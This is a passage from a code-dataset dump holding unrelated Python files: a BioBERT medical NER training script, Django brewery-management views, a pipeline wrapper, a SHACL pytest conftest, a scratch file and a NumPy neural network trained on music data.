'B-PARACLINICAL': 14,\r\n 'B-BIOCHEMICAL': 15,\r\n 'B-GENDER': 16,\r\n 'B-DIAGNOSIS': 17,\r\n 'L-AGE': 18,\r\n 'L-PARACLINICAL': 19,\r\n 'U-ETHNICITY': 20,\r\n 'L-SYMPTOMS': 21,\r\n 'L-ETHNICITY': 22,\r\n 'I-DIAGNOSIS': 23,\r\n 'I-AGE': 24,\r\n 'U-PARACLINICAL': 25,\r\n 'U-BIOCHEMICAL': 26,\r\n 'B-GENETICS': 27,\r\n 'U-FAMILY': 28,\r\n 'I-ETHNICITY': 29,\r\n 'L-GENETICS': 30,\r\n 'U-NEG_FINDINGS': 31,\r\n 'B-AGE': 32,\r\n 'I-SYMPTOMS': 33,\r\n 'U-GENETICS': 34,\r\n 'B-FAMILY': 35,\r\n 'L-BIOCHEMICAL': 36,\r\n 'U-GENDER': 37,\r\n 'L-DIAGNOSIS': 38,\r\n 'L-MEDICATION': 39,\r\n 'I-PARACLINICAL': 40,\r\n 'L-NEG_FINDINGS': 41,\r\n 'U-AGE': 42,\r\n 'U-SYMPTOMS': 43,\r\n 'I-MEDICATION': 44}\r\nid2tag = {id: tag for tag, id in tag2id.items()}\r\n\r\n# encoding the data\r\ntokenizer = AutoTokenizer.from_pretrained('dmis-lab/biobert-v1.1')\r\ntrain_encodings = tokenizer(train_texts, is_split_into_words=True, return_offsets_mapping=True, padding=True, truncation=True)\r\nval_encodings = tokenizer(val_texts, is_split_into_words=True, return_offsets_mapping=True, padding=True, truncation=True)\r\n\r\n# matching the tags to the corresponding subtokens\r\ntrain_labels = encode_tags2(train_tags, train_encodings)\r\nval_labels = encode_tags2(val_tags, val_encodings)\r\n\r\n# removes the offset mappings and defines the training dataset and the validation dataset\r\ntrain_encodings.pop(\"offset_mapping\")\r\nval_encodings.pop(\"offset_mapping\")\r\ntrain_dataset = NERDataset(train_encodings, train_labels)\r\nval_dataset = NERDataset(val_encodings, val_labels)\r\n\r\n\r\n# BERT + Fine Tuning\r\n\r\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\r\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n# training BioBERT v1.1 (BERT_BASE initially)\r\nmodel = AutoModelForTokenClassification.from_pretrained('dmis-lab/biobert-v1.1', num_labels=len(unique_tags))\r\n# using the current model\r\n#model = AutoModelForTokenClassification.from_pretrained('./cur_model')\r\n\r\nmodel.to(device)\r\n\r\ntraining_args = TrainingArguments(\r\n output_dir='./results', # output directory\r\n num_train_epochs=10, # total number of training epochs\r\n per_device_train_batch_size=16, # batch size per device during training\r\n per_device_eval_batch_size=64, # batch size for evaluation\r\n warmup_steps=169, # number of warmup steps for learning rate scheduler\r\n weight_decay=0.0042, # strength of weight decay\r\n logging_dir='./logs', # directory for storing logs\r\n logging_steps=100,\r\n evaluation_strategy=\"epoch\",\r\n overwrite_output_dir = True,\r\n save_total_limit = 5,\r\n save_steps = 500,\r\n learning_rate=6.917e-05,\r\n )\r\n\r\ntrainer = Trainer(\r\n model=model, # the instantiated 🤗 Transformers model to be trained\r\n args=training_args, # training arguments, defined above\r\n train_dataset=train_dataset, # training dataset\r\n eval_dataset=val_dataset, # evaluation dataset\r\n compute_metrics=compute_metrics,\r\n)\r\n\r\n# hyperparameter tuning\r\n'''\r\ndef hp_space_optuna(trial) -> Dict[str, float]:\r\n from transformers.integrations import is_optuna_available\r\n\r\n assert is_optuna_available(), \"This function needs Optuna installed: `pip install optuna`\"\r\n return {\r\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 1e-6, 1e-3, log=True),\r\n \"num_train_epochs\": trial.suggest_int(\"num_train_epochs\", 3, 10),\r\n \"seed\": trial.suggest_int(\"seed\", 1, 40),\r\n \"per_device_train_batch_size\": 
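The hard-coded tag2id above presumably pins ids so saved checkpoints stay compatible between runs. If determinism is all that is needed, sorting the tag set achieves it without the literal table, since set iteration order is not stable across processes:

# Deterministic alternative to the hand-written mapping.
tag2id = {tag: i for i, tag in enumerate(sorted(unique_tags))}
id2tag = {i: tag for tag, i in tag2id.items()}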
trial.suggest_categorical(\"per_device_train_batch_size\", [4, 8, 16, 32]),\r\n \"weight_decay\": trial.suggest_float(\"weight_decay\", 0.0001, 1, log=True),\r\n \"warmup_steps\": trial.suggest_int(\"warmup_steps\", 1, 1000),\r\n }\r\n\r\nbest_trials = trainer.hyperparameter_search(\r\n direction=\"maximize\", \r\n backend=\"optuna\",\r\n n_trials = 300,\r\n hp_space = hp_space_optuna\r\n)\r\n \r\nprint(best_trials)\r\n'''\r\nprint(\"Training start: \")\r\nprint(dt.datetime.now())\r\nt1 = time.time()\r\ntrainer.train()\r\nresult = trainer.evaluate()\r\nprint(result)\r\nprint(\"Time taken: \"+str((time.time()-t1)/60)+\" min\")\r\n# saving the model\r\n#trainer.save_model(output_dir='./cur_model')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"232074168","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom datetime import datetime\n#from influxdb import InfluxDBClient\n#import plotly.graph_objects as go\n#from plotly.offline import plot\n#from plotly.subplots import make_subplots\n\nimport base64\nfrom math import pow\nfrom os import environ\n\nfrom .models import Recipe, Step, Charge, RecipeProtocol, Keg, Hint, FermentationProtocol\nfrom .forms import *\n\n# Used for recipe scaling\nAMOUNT_FACTOR = 100\n\ndef index(request):\n return render(request, 'brewery/index.html')\n\n\ndef protocol_step(charge, step, starttime):\n c = charge\n s = step\n tstart = starttime\n pstep = RecipeProtocol()\n pstep.charge = Charge.objects.get(id=c.id)\n pstep.step = s.id\n pstep.title = s.title\n pstep.description = s.description\n pstep.duration = s.duration\n pstep.ingredient = s.ingredient\n pstep.amount = (s.amount * c.amount) / AMOUNT_FACTOR if s.amount else s.amount\n pstep.tstart = tstart\n pstep.tend = datetime.now()\n return pstep\n\n\ndef storage_delta(charge, step):\n required = charge.amount * step.amount / AMOUNT_FACTOR\n available = Storage.objects.get(name=step.ingredient).amount\n delta = available - required\n return delta\n\n\n@login_required\ndef brewing_overview(request):\n c = Charge.objects.filter(finished=True)\n active = Charge.objects.filter(finished=False)\n context = {\n 'charge': c,\n 'active': active\n }\n return render(request, 'brewery/brewing_overview.html', context)\n\n\n@login_required\ndef brewing(request, cid):\n c = get_object_or_404(Charge, pk=cid)\n preps = PreparationProtocol.objects.filter(charge=c)\n context = {}\n # Charge complete\n if c.finished:\n return HttpResponseRedirect(reverse('protocol', kwargs={'cid': c.id}))\n # Fermentation: Starting point\n elif c.preps_finished and c.brewing_finished:\n return HttpResponseRedirect(reverse('fermentation', kwargs={'cid': c.id}))\n # Brewing: Restore session\n elif c.preps_finished and not request.POST:\n step = c.current_step\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['charge'] = c\n context['tstart'] = datetime.now()\n context['step'] = step\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n context['form'] = BrewingProtocol()\n\n return render(request, 'brewery/brewing.html', context)\n # Brewing: Start process if not already finished\n else:\n # Preparations: save current result\n if 
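For the commented-out trainer.hyperparameter_search() call to work, the Trainer must be constructed with model_init rather than model, so each Optuna trial starts from fresh weights; the file defines model_init() but passes model=. A sketch of the required wiring:

trainer = Trainer(
    model_init=model_init,           # re-instantiated per trial
    args=training_args,
    train_dataset=train_dataset,
    eval_dataset=val_dataset,
    compute_metrics=compute_metrics,
)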
request.POST.get('preps_save'):\n preps_form = [PreparationProtocolForm(request.POST, prefix=str(item), instance=item) for item in preps]\n for pf in preps_form:\n if pf.is_valid():\n pf.save()\n return HttpResponseRedirect(reverse('brewing_overview'))\n\n # Preparations: if finished, continue brewing\n if request.POST.get('preps_next'):\n preps_form = [PreparationProtocolForm(request.POST, prefix=str(item), instance=item) for item in preps]\n for pf in preps_form:\n if pf.is_valid():\n pf.save()\n # Check for finished preps\n finished = not(preps.filter(check=False).exists())\n context = {'charge': c, 'list': zip(preps, preps_form)}\n if finished:\n c.preps_finished = True\n c.save()\n step = Step.objects.get(pk=c.recipe.first)\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['step'] = step\n context['tstart'] = datetime.now()\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['form'] = BrewingProtocol()\n return render(request, 'brewery/brewing.html', context)\n else:\n return render(request, 'brewery/brewing.html', context)\n\n # Brewing: get next step\n if request.POST.get('brew_next'):\n cid = request.POST.get('charge')\n c = Charge.objects.get(pk=cid)\n pform = BrewingProtocol(request.POST)\n step = c.current_step\n print(\"Get next: {}\".format(step))\n tstart = datetime.strptime(request.POST.get('tstart')[:-1], \"%Y%m%d%H%M%S%f\")\n if pform.is_valid():\n # Create step of protocol\n pstep = protocol_step(c, step, tstart)\n pstep.comment = pform.cleaned_data['comment']\n pstep.save()\n # Update storage\n if step.amount:\n item = Storage.objects.get(name=step.ingredient)\n item.amount = storage_delta(c, step)\n item.save() \n try:\n print(\"TRY: {}\".format(step.next))\n step = step.next\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['charge'] = c\n context['tstart'] = datetime.now()\n context['step'] = step\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n context['form'] = BrewingProtocol()\n c.current_step = step\n c.save()\n return render(request, 'brewery/brewing.html', context)\n except:\n # Calculate overall duration time\n c.duration = datetime.now() - c.production.replace(tzinfo=None)\n c.brewing_finished = True\n c.save()\n context['charge'] = c\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n return HttpResponseRedirect(reverse('fermentation', kwargs={'cid': c.id}))\n else:\n print(\"pform not valid\")\n # Preparations: start preparations\n else:\n preps_form = [PreparationProtocolForm(prefix=str(item), instance=item) for item in preps]\n zipped_list = zip(preps, preps_form)\n for s in Step.objects.filter(recipe=c.recipe):\n if s.amount:\n delta = storage_delta(c, s)\n context = {'charge': c, 'list': zipped_list}\n return render(request, 'brewery/brewing.html', context)\n\n@login_required\ndef brewing_add(request):\n if request.method == 'POST':\n charge_form = BrewingCharge(request.POST)\n protocol_form = BrewingProtocol(request.POST)\n if request.POST.get('create'):\n if charge_form.is_valid():\n # Create charge\n c = Charge()\n # Calculate charge ID\n current_year = datetime.now().strftime(\"%Y\")\n yearly_production = Charge.objects.filter(production__contains=current_year + \"-\").count() + 1\n current_year_month = datetime.now().strftime(\"%Y%m\")\n # Create new charge\n c.cid = current_year_month + \".\" + str(yearly_production)\n c.recipe = 
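The per-item prefix=str(item) form lists above re-implement what Django's model formsets provide. A minimal sketch with modelformset_factory, assuming PreparationProtocol (as imported in views.py) exposes the boolean "check" field the view filters on:

from django.forms import modelformset_factory

PrepFormSet = modelformset_factory(PreparationProtocol, fields=("check",), extra=0)

def save_preps(request, charge):
    # One formset replaces the list of individually prefixed forms.
    formset = PrepFormSet(
        request.POST,
        queryset=PreparationProtocol.objects.filter(charge=charge))
    if formset.is_valid():
        formset.save()
    return formset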
charge_form.cleaned_data['recipe']\n c.amount = charge_form.cleaned_data['amount']\n c.brewmaster = charge_form.cleaned_data['brewmaster']\n c.production = datetime.now()\n c.current_step = Step.objects.get(pk=c.recipe.first)\n c.save()\n\n # Create required preparations\n preps = Preparation.objects.filter(recipe__id=c.recipe.id)\n for p in preps:\n preps_protocol = PreparationProtocol()\n preps_protocol.charge = c\n preps_protocol.preparation = p\n preps_protocol.check = False\n preps_protocol.save()\n\n context = {\n 'charge': c,\n 'form': protocol_form,\n 'next': True,\n }\n return HttpResponseRedirect(reverse('brewing', kwargs={'cid': c.id}))\n\n \n else:\n charge_form = BrewingCharge()\n context = {'form': charge_form}\n return render(request, 'brewery/brewing.html', context)\n\n\n@login_required\ndef protocol(request, cid):\n c = Charge.objects.get(pk=cid)\n p = RecipeProtocol.objects.filter(charge=c.id)\n d = c.duration\n context = {'protocol': p, 'charge': c, 'duration': d}\n\n return render(request, 'brewery/protocol.html', context)\n\n\n@login_required\ndef fermentation(request, cid):\n c = Charge.objects.get(pk=cid)\n f = FermentationProtocol.objects.filter(charge=c)\n context = {}\n context['charge'] = c\n context['fermentation'] = f\n context['form'] = FermentationProtocolForm()\n if request.POST:\n if request.POST.get('spindel') == \"True\":\n c.ispindel = True\n c.save()\n return render(request, 'brewery/fermentation.html', context)\n if request.POST.get('save'):\n form = FermentationProtocolForm(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n form.charge = c\n form.save()\n context['form'] = FermentationProtocolForm()\n context['fermentation'] = FermentationProtocol.objects.filter(charge=c)\n if request.POST.get('finished'):\n c.finished = True\n c.save()\n return HttpResponseRedirect(reverse('brewing_overview'))\n return render(request, 'brewery/fermentation.html', context)\n else:\n if not c.fermentation:\n c.fermentation = True\n c.save()\n return render(request, 'brewery/fermentation.html', context)\n else:\n return render(request, 'brewery/fermentation.html', context)\n\n@login_required\ndef spindel(request):\n \"\"\"\"\n client = InfluxDBClient(host='braurat.de', port=8086, username='admin', password=environ['INFLUXDB_PASS'])\n client.switch_database('ispindel')\n q = client.query('SELECT \"tilt\",\"temperature\", \"battery\" FROM \"measurements\"')\n # ['time', 'RSSI', 'battery', 'gravity', 'interval', 'source', 'temp_units', 'temperature', 'tilt'],\n time = []\n tilt = []\n temperature = []\n battery = []\n points = q.get_points()\n for item in points:\n time.append(item['time'])\n # Ploynom: 0.000166916x^3 + -0.01470147x^2 + 0.679876283x + -10.536229152\n x = item['tilt']\n plato = (0.000166916 * pow(x, 3))\n plato = plato - (0.01470147 * pow(x, 2))\n plato = plato + (0.679876283 * x)\n plato = plato - 10.536229152\n tilt.append(plato)\n\n temperature.append(item['temperature'])\n battery.append(item['battery'])\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n fig.update_layout(\n title=\"iSpindel\",\n xaxis_title=\"Zeit\",\n yaxis_title=\"Vergärungsgrad\",\n yaxis_range=[-10, 40],\n yaxis2=dict(\n title=\"Grad Celius\",\n overlaying='y',\n side='right',\n range=[2, 30]\n ),\n legend_title=\"Legende\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"RebeccaPurple\"\n )\n )\n fig.add_trace(go.Scatter(x=time, y=tilt,\n line_shape='spline',\n mode='lines',\n name='Plato'),\n secondary_y=False)\n 
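The charge id is "YYYYMM.n" with n counting this year's charges; note that production__contains matches a string pattern against a datetime column. A sketch using the idiomatic __year lookup (the function name is mine; Charge as imported in views.py):

from datetime import datetime

def next_charge_id(now=None):
    now = now or datetime.now()
    n = Charge.objects.filter(production__year=now.year).count() + 1
    return "{:%Y%m}.{}".format(now, n)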
fig.add_trace(go.Scatter(x=time, y=temperature,\n line_shape='spline',\n mode='lines',\n name='Temepratur'),\n secondary_y=True)\n fig.add_trace(go.Scatter(x=time, y=battery,\n line_shape='spline',\n mode='lines',\n name='Batterie'))\n\n plt_div = plot(fig, output_type='div')\n client.close()\n\n print(len(time))\n\n return render(request, 'brewery/spindel.html', {'plot': plt_div})\n \"\"\"\n plt_div = None\n return render(request, 'brewery/spindel.html', {'plot': plt_div})\n\n\n@login_required\ndef recipe(request):\n r = Recipe.objects.all()\n context = {'recipes': r}\n return render(request, 'brewery/recipe.html', context)\n\n### HELPER FUNCTION\ndef get_steps(recipe):\n try:\n step = Step.objects.get(pk=recipe.first)\n except:\n step = None\n s = []\n while step:\n s.append(step)\n try:\n step = step.next\n except:\n step = None\n return s\n\n\n@login_required\ndef recipe_detail(request, recipe_id):\n r = Recipe.objects.get(pk=recipe_id)\n s = get_steps(r) \n p = Preparation.objects.filter(recipe=r)\n\n if request.method == 'POST':\n if request.POST.get('delete'):\n r.delete()\n return HttpResponseRedirect(reverse('recipe'))\n\n context = {'recipe': r, 'steps': s, 'preparation': p}\n\n return render(request, 'brewery/recipe_detail.html', context)\n\n\n@login_required\ndef recipe_add(request):\n if request.method == 'POST':\n add_recipe = AddRecipe(request.POST)\n select_preparation = SelectPreparation(request.POST)\n if add_recipe.is_valid():\n ar = add_recipe.save(commit=False)\n ar.author = request.user\n ar.creation = datetime.now()\n ar.save()\n if select_preparation.is_valid():\n for item in select_preparation.cleaned_data['preparation']:\n prep = get_object_or_404(Preparation, short=item)\n prep.recipe.add(ar)\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': ar.id}))\n\n add_recipe = AddRecipe()\n select_preparation = SelectPreparation()\n context = {'add_recipe': add_recipe, 'select_preparation': select_preparation}\n\n return render(request, 'brewery/recipe_add.html', context)\n\n\n@login_required\ndef recipe_edit(request, recipe_id):\n r = Recipe.objects.get(pk=recipe_id)\n s = get_steps(r)\n preps = SelectPreparation()\n\n # Get steps which are not properly linked\n unused_steps = Step.objects.filter(recipe=r)\n try:\n used_steps = Step.objects.get(pk=r.first)\n except:\n used_steps = None\n\n while used_steps:\n unused_steps = unused_steps.exclude(pk=used_steps.id)\n try:\n used_steps = used_steps.next\n except:\n used_steps = None\n \n if request.method == 'POST':\n if request.POST.get('add'):\n return HttpResponseRedirect(reverse('step_add', kwargs={'recipe_id': r.id}))\n\n form = EditRecipe()\n context = {'form': form, 'steps': s, 'recipe': r, 'unused': unused_steps, 'preps': preps}\n\n return render(request, 'brewery/recipe_edit.html', context)\n\n\ndef step_edit(request, recipe_id, step_id=None):\n r = Recipe.objects.get(pk=recipe_id)\n if step_id is None:\n form = StepForm()\n else:\n s = Step.objects.filter(recipe=recipe_id).get(pk=step_id)\n form = StepForm(instance=s)\n if request.method == 'POST':\n if step_id is None:\n form = StepForm(request.POST)\n else:\n form = StepForm(request.POST, instance=s)\n # Update linked list\n try:\n prev = Step.objects.get(pk=form.data['prev'])\n except:\n prev = None\n try:\n old_next = prev.next\n old_next.prev = None\n old_next.save()\n except:\n old_next = None\n\n if form.is_valid():\n step = form.save(commit=False)\n step.recipe = r\n step.save()\n # Update linked list\n if old_next:\n old_next.prev = 
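The tilt-to-Plato polynomial buried in the commented-out spindel() view is easier to test as a standalone function; the coefficients are device-specific calibration values taken verbatim from the code above:

def tilt_to_plato(tilt):
    # 0.000166916x^3 - 0.01470147x^2 + 0.679876283x - 10.536229152,
    # evaluated with Horner's rule.
    return ((0.000166916 * tilt - 0.01470147) * tilt
            + 0.679876283) * tilt - 10.536229152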
step\n old_next.save()\n if not prev:\n r.first = step.id\n r.save()\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': r.id}))\n else:\n print(dict(form.errors))\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': r.id}))\n # Filter choosable steps for specified recipe\n form.fields[\"prev\"].queryset = Step.objects.filter(recipe=recipe_id)\n\n context = {'form': form, 'recipe': r}\n return render(request, 'brewery/step_edit.html', context)\n\n\n@login_required\ndef storage(request):\n items = Storage.objects.all()\n context = {'storage': items}\n return render(request, 'brewery/storage.html', context)\n\n\n@login_required\ndef storage_add(request):\n form = StorageAddItem(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('storage'))\n\n context = {'storage': storage, 'form': form}\n return render(request, 'brewery/storage_add.html', context)\n\n\n@login_required\ndef storage_edit(request, s_id):\n item = Storage.objects.get(pk=s_id)\n form = StorageAddItem(instance=item)\n if request.method == 'POST':\n form = StorageAddItem(request.POST, instance=item)\n if form.is_valid():\n if request.POST.get('save'):\n form.save()\n return HttpResponseRedirect(reverse('storage'))\n if request.POST.get('delete'):\n item.delete()\n return HttpResponseRedirect(reverse('storage'))\n context = {'form': form}\n return render(request, 'brewery/storage_edit.html', context)\n\n\n@login_required\ndef keg(request):\n kegs = Keg.objects.all()\n if request.method == 'POST':\n print(\"request.POST: %s\" % request.POST)\n if request.POST.get('edit'):\n keg_forms = [EditKegContent(prefix=str(k), instance=k) for k in kegs]\n zipped_list = zip(kegs, keg_forms)\n context = {'list': zipped_list}\n return render(request, 'brewery/keg.html', context)\n if request.POST.get('save'):\n keg_forms = [EditKegContent(request.POST, prefix=str(k), instance=k) for k in kegs]\n for kf in keg_forms:\n if kf.is_valid():\n kf.save()\n\n return HttpResponseRedirect(reverse('keg'))\n else:\n context = {'kegs': kegs}\n return render(request, 'brewery/keg.html', context)","sub_path":"brewery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257919525","text":"from .imodule import IModule\nfrom .structures import FrameData\n\n\nclass FrameDataModule(IModule):\n \"\"\"\n Check that incoming and outcoming data is FrameData.\n Specific for FrameData Pipelines\n \"\"\"\n\n def __init__(self, module):\n \"\"\"\n Args:\n module: IModule\n \"\"\"\n super(FrameDataModule, self).__init__()\n\n self.module = module\n\n def process(self, data, **kwargs):\n \"\"\"\n Args:\n data: structures.FrameData\n\n Returns:\n result: structures.FrameData\n \"\"\"\n\n assert isinstance(data, FrameData), \"Invalid type. {} != {}\".format(\n type(data), FrameData.__class__.__name__)\n\n result = self.module.process(data, **kwargs)\n\n assert isinstance(result, FrameData), \"Invalid type. 
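get_steps() and recipe_edit() walk the step chain with bare try/except. A sketch of an explicit walk, assuming Step.next is a reverse one-to-one accessor whose DoesNotExist subclasses AttributeError (as Django's does), so getattr with a default suffices:

def walk_steps(recipe):
    # Yield steps in linked-list order, starting at recipe.first.
    step = Step.objects.filter(pk=recipe.first).first()
    while step is not None:
        yield step
        step = getattr(step, "next", None)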
{} != {}\".format(\n type(result), FrameData.__class__.__name__)\n\n return result\n","sub_path":"src/base/frame_data_module.py","file_name":"frame_data_module.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407773251","text":"import os, sys\nimport pytest\nimport logging\nimport glob\nfrom .shaclvalidator import get_graph\n\nlogger = logging.getLogger(__name__)\n\nPATH = os.getcwd()\npytest.SHACL_SHACL = os.path.join(PATH, 'tests', 'shacl-schema.ttl')\n\nif not os.path.exists(pytest.SHACL_SHACL):\n logger.error(f'{pytest.SHACL_SHACL} not found')\n sys.exit()\n\n\n@pytest.fixture(scope='session')\ndef shacl_schema():\n logger.info(\"loading SHACL of SHACL schema\")\n return get_graph(pytest.SHACL_SHACL)\n\n\ndef pytest_addoption(parser):\n default_scan_dir = os.path.join(PATH, '..', 'neuroshapes', 'shapes')\n parser.addoption(\"--scan_dir\", action=\"store\", default=default_scan_dir)\n\n\ndef pytest_generate_tests(metafunc):\n\n # perform schemas validation\n scan_dir = metafunc.config.option.scan_dir\n logger.info(f'scanning {scan_dir}')\n\n schema_files = [f for f in glob.iglob(scan_dir + '/**/schema.json', recursive=True)]\n\n datashape_files = [f.replace('schema.json', os.path.join('examples', 'datashapes.json')) for f in schema_files]\n datashape_files = list(filter(lambda f: os.path.exists(f), datashape_files))\n shapes_files = schema_files + datashape_files\n\n if \"schema_file\" in metafunc.fixturenames:\n metafunc.parametrize(\"schema_file\", shapes_files)\n\n tests_payload = []\n for sh in schema_files:\n\n subdir = sh.replace(os.sep + 'schema.json', '')\n\n if not os.path.exists(os.sep.join([subdir, 'examples'])):\n continue\n\n shape_file = sh\n datashape_example = os.sep.join([subdir, 'examples', 'datashapes.json'])\n if os.path.exists(datashape_example):\n shape_file = datashape_example\n\n valid_dir = os.sep.join([subdir, 'examples', 'valid']) + os.sep\n if os.path.exists(valid_dir):\n for f in glob.glob(valid_dir + '*.json'):\n tests_payload.append((shape_file, f, True))\n\n invalid_dir = os.sep.join([subdir, 'examples', 'invalid']) + os.sep\n if os.path.exists(invalid_dir):\n for f in glob.glob(invalid_dir + '*.json'):\n tests_payload.append((shape_file, f, False))\n\n if set(['shapes_file', 'test_file', 'test_valid']).issubset(set(metafunc.fixturenames)):\n metafunc.parametrize('shapes_file, test_file, test_valid', tests_payload)\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"478332478","text":"import time\n\n# print('%.1f%%' % ((85 - 72) / 72.0 * 100))\n# for x in range(55296) :\n# if x % 100 == 0 :\n# print(chr(x))\n# else:\n# print(chr(x), end=\"\")\n\n# print(ord(\"a\"))\n\n# a = 101\n# if a > 10 : {\n# print(a)\n# }\n# sum1 = 0\n# for b in range(a):\n# sum1 += b\n# print(sum1)\n\n# while sum1 > 100 :\n# # print(sum1)\n# # time.sleep(1)\n# sum1 -= 1\n\nprint(bin(1 << 4))\nprint(bin(11<<4))\n\ndef my_abs(s):\n if s >= 0:\n return s, -s\n else:\n return -s, s\n\ndef npp():\n pass\n\ndef mr(a, b = 2):\n return a + b\n\ndef pf(*nums):\n sum = 0\n for i in nums:\n sum = sum + i * i\n return sum\n\n\nnnn = 
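pytest_generate_tests() above parametrizes by fixture name, so a consuming test just declares matching arguments. A hedged sketch of the shape such a test takes; the real assertion would run the SHACL validation that lives elsewhere in this repo:

import os

def test_shapes_match_examples(shapes_file, test_file, test_valid):
    # Invoked once per (shapes_file, test_file, test_valid) tuple collected
    # from the valid/ and invalid/ example directories.
    assert os.path.exists(shapes_file) and os.path.exists(test_file)
    assert isinstance(test_valid, bool)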
[1,2,3,4,5,6,7]\nprint(pf(1,2,3,9))\nprint(pf(*nnn))","sub_path":"pythonPrj/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616482292","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport csv\nimport sys\nimport math\nimport numpy as np\nimport time\nimport random\nimport time\n\nmusic_train_file = sys.argv[1]\nwith open(music_train_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n music_train = []\n for i in readCSV:\n music_train.append(i)\n\n# Get the original value\ni = 0\nvalue = []\nyear = []\nlength = []\njazz = []\nrock = []\nnew_value = []\nfor row in music_train:\n i +=1\n if i > 1:\n year.append(row[0])\n length.append(row[1])\n jazz.append(row[2])\n rock.append(row[3])\n value.append(row)\nmin_year = min(year)\nmax_year = max(year)\nmin_length = min(length)\nmax_length = max(length)\n\n# Do feature scaling and change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nyear_new = []\nlength_new = []\njazz_new = []\nrock_new = []\nfor i in year:\n year_new.append((float(i)-float(min_year))/(float(max_year)-float(min_year)))\nfor i in length:\n length_new.append((float(i)-float(min_length))/(float(max_length)-float(min_length)))\nfor i in jazz:\n if i == \"yes\":\n jazz_new.append(1.0)\n if i == \"no\":\n jazz_new.append(0.0)\nfor i in rock:\n if i == \"yes\":\n rock_new.append(1.0)\n if i == \"no\":\n rock_new.append(0.0) \n \n# Get the new training set\ntraining = []\nfor i in range(len(year_new)):\n training.append(np.asarray([1.0, year_new[i], length_new[i], jazz_new[i], rock_new[i]]).reshape(1,-1))\ntraining_data = np.asarray(training)\n\n# Get keys\nmusic_train_key_file = sys.argv[2]\nwith open(music_train_key_file) as csvfile:\n readCSV = csv.reader(csvfile)\n music_key = []\n for i in readCSV:\n music_key.append(i)\n# Change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nkey_new = []\nfor i in music_key:\n if i == ['yes']:\n key_new.append([1.0])\n if i == ['no']:\n key_new.append([0.0])\ntraining_key = np.asarray(key_new,float)\n\n# Get weights\nmusic_weight_1 = sys.argv[4]\nwith open(music_weight_1) as csvfile:\n readCSV = csv.reader(csvfile)\n input_weight1 = []\n for i in readCSV:\n input_weight1.append(i)\ninput_weight = np.asarray(input_weight1,float)\n# Get weights\nmusic_weight_2 = sys.argv[5]\nwith open(music_weight_2) as csvfile:\n readCSV = csv.reader(csvfile)\n neuron_weight1 = []\n for i in readCSV:\n neuron_weight1.append(i)\nneuron_weight = np.asarray(neuron_weight1,float)\n\ntraining1 = []\nfor i in range(len(year_new)):\n training1.append([1.0, year_new[i], length_new[i], jazz_new[i], rock_new[i]])\ntraining_data1 = np.asarray(training1)\n\nlast_loss = 13\nfor i in range(0,3054):\n # Get the hidden layer output should be 100 * 3\n hidden_layer_output = 1/(1+(np.exp(-np.dot(training_data1, input_weight)))) \n # Get hidden layer output + x0\n new_hidden_layer_output = np.insert(hidden_layer_output, 0, 1.0, axis=1)\n # Get the output\n output = 1/(1+(np.exp(-np.dot(new_hidden_layer_output, neuron_weight)))) \n # Compute loss function\n k = output - training_key\n j = k * k\n sum_j = np.sum(j)\n loss_function_1 = 1/(2) * sum_j\n if loss_function_1 < last_loss:\n print(loss_function_1)\n else:\n break\n \n # Get delta output\n delta_output = -(-k)*output*(1-output)\n delta_hidden_layer = new_hidden_layer_output * (1-new_hidden_layer_output) * delta_output * neuron_weight.T\n q = np.delete(delta_hidden_layer, 0, axis=1)\n 
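The scaling block above takes min/max of the raw strings, and lexicographic string order only coincides with numeric order while all values have the same number of digits. It also recomputes the bounds per dataset; passing the training bounds when scaling dev data keeps both sets in one coordinate system (the prediction block further down rescales from the dev set instead). A sketch:

def min_max_scale(values, lo=None, hi=None):
    # Scale to [0, 1]; pass the training lo/hi when scaling dev/test data.
    values = [float(v) for v in values]
    lo = min(values) if lo is None else lo
    hi = max(values) if hi is None else hi
    return [(v - lo) / (hi - lo) for v in values]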
